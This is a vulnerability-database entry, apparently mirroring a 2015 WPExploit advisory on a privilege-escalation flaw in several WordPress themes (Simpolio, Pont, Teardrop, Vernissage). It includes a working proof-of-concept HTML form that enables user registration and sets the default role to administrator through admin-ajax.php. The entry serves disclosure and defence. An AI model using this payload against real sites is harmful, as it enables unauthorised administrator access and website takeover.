Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitA. SammanWPEX-ID:C04FB575-81DF-47B6-90FB-AC6CA43C720B
HistoryJun 26, 2015 - 12:00 a.m.

Multiple Themes - Privilige Escalation

2015-06-2600:00:00
A. Samman
6

EPSS

0.001

Percentile

44.1%

JSON

The themes suffer from a privilege escalation vulnerability, any authenticated user can trigger this vulnerability due to weak permissions checking. An attacker can update options, such as changing user’s default role, registration state and others, which may lead to executing commands/code on the server and taking over the website. Tested Versions: Simpolio 1.3.2 Pont 1.5 Teardrop 1.8.1 Vernissage 1.2.8

<form action="http://example.com/wp-admin/admin-ajax.php?action=of_ajax_post_action" method="post" >
	<input name="type" value="save" type="hidden" />
	<input name="data[users_can_register]" value="1" type="hidden" />
	<input name="data[default_role]" value="administrator" type="hidden" />
	<input type="submit" >
</form>

Related

wpvulndb 1
cvelist 4
prion 4
nvd 4
cve 4
wpvulndb
wpvulndb
Multiple Themes - Privilige Escalation
2015-06-26 00:00:00
cvelist
cvelist
CVE-2015-9477
2019-10-10 16:17:25
CVE-2015-9474
2019-10-10 16:15:39
CVE-2015-9476
2019-10-10 16:16:52
prion
prion
Input validation
2019-10-10 17:15:00
Input validation
2019-10-10 17:15:00
Input validation
2019-10-10 17:15:00
nvd
nvd
CVE-2015-9477
2019-10-10 17:15:15
CVE-2015-9474
2019-10-10 17:15:15
CVE-2015-9476
2019-10-10 17:15:15
cve
cve
CVE-2015-9477
2019-10-10 17:15:15
CVE-2015-9476
2019-10-10 17:15:15
CVE-2015-9475
2019-10-10 17:15:15

EPSS

0.001

Percentile

44.1%

JSON
Related for WPEX-ID:C04FB575-81DF-47B6-90FB-AC6CA43C720B
wpvulndb1cvelist4prion4nvd4cve4